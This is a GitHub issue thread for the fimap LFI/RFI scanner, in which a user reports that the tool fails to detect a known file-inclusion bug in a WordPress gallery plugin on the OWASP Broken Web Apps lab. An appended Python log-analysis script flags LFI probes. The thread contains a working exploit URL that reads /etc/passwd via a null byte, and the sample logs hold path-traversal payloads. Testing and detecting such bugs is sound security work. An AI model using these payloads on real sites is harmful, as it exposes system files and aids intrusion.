kurobeats / fimap

fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps.
GNU General Public License v2.0

Wordpress plugin LFI not discovered #66

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago
I'm trying out your tool fimap and I'm trying it against a vulnerable Wordpress plugin on the OWASP Broken Web Apps virtual machine:
https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project

The plugin can be exploited with
http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=/etc/passwd%00

However, fimap does not discover this:
root@bt:~/fimap_alpha_v09# ./fimap.py -u 'http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=test'
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: 'http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=test'
[19:36:02] [OUT] Inspecting URL 'http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=test'...
[19:36:02] [INFO] Fiddling around with URL...
[19:36:02] [WARN] HTTP Error 500: Internal Server Error
Target URL isn't affected by any file inclusion bug :(

Running fimap on Backtrack 5.

Original issue reported on code.google.com by treh...@gmail.com on 13 Jan 2012 at 10:17

GoogleCodeExporter commented 9 years ago
Hi!

Can you try enabling blindmode?
Just add the "-b" parameter and see if it works.

What I don't like about your log is the HTTP Error 500.
Also enable more logging to see what's going on there, -v 6 for example.

-imax.

Original comment by fimap....@gmail.com on 21 Jan 2012 at 8:38

GoogleCodeExporter commented 9 years ago
Hello,

-b did not resolve this issue:

./fimap.py -b -u 'http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=test'
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

Blind FI-error checking enabled.
SingleScan is testing URL: 'http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=test'
[21:18:45] [OUT] Inspecting URL 'http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=test'...
[21:18:45] [INFO] Fiddling around with URL...
[21:18:45] [WARN] HTTP Error 500: Internal Server Error
[21:18:45] [INFO] Sniper failed. Going blind...
[21:18:45] [WARN] HTTP Error 500: Internal Server Error
Target URL isn't affected by any file inclusion bug :(

Best regards,
Tomas

Original comment by treh...@gmail.com on 9 Feb 2012 at 9:23

GoogleCodeExporter commented 9 years ago
Hey man,

Sorry for my late response.
I think it has something to do with the error code.
The default behaviour is to cancel any test if there was an error code.
Maybe that was a stupid idea.

However I will take a look at what's going wrong there.

Thank you and sorry for my late response,
-imax.

Original comment by fimap....@gmail.com on 12 Apr 2012 at 8:33
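The thread above shows the scanner giving up as soon as the endpoint answers 500, although a PHP include() of an unusable path failing with a 500 is itself evidence. As an added example (not part of this issue thread and not fimap's own code), the following log-side detection takes the opposite stance: each request is judged by the LFI indicators in its query parameters (null byte, traversal, absolute path) and the 500 is recorded with the hit rather than ending the check. The access-log lines are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache-style access log lines (sample data, not taken from the issue).
SAMPLE_LOG = """\
10.0.0.5 - - [13/Jan/2012:19:36:02 +0100] "GET /wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=test HTTP/1.1" 500 512 "-" "fimap"
10.0.0.5 - - [13/Jan/2012:19:37:10 +0100] "GET /wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=/etc/passwd%00 HTTP/1.1" 200 1789 "-" "Mozilla/5.0"
10.0.0.7 - - [13/Jan/2012:19:38:00 +0100] "GET /wordpress/index.php?p=42 HTTP/1.1" 200 9311 "-" "Mozilla/5.0"
10.0.0.9 - - [13/Jan/2012:19:39:00 +0100] "GET /wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../etc/passwd HTTP/1.1" 500 480 "-" "curl/7.21"
"""

# Minimal combined-log-format parser: client IP, timestamp, request target, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def lfi_indicators(value):
    """Return the LFI indicators present in one already URL-decoded parameter value."""
    found = []
    if "\x00" in value:            # %00 used to truncate an appended extension
        found.append("null_byte")
    if "../" in value or "..\\" in value:
        found.append("traversal")
    if value.startswith("/"):      # absolute path such as /etc/passwd
        found.append("absolute_path")
    return found


def find_lfi_probes(log_text):
    """Flag requests whose query parameters carry LFI indicators, whatever the status.

    The status is kept in the record: a 500 from an include() of an unusable
    path is part of the evidence, not a reason to drop the request.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            reasons = lfi_indicators(value)
            if reasons:
                hits.append({"ip": m.group("ip"), "param": name,
                             "status": int(m.group("status")), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_lfi_probes(SAMPLE_LOG):
        print(hit)
```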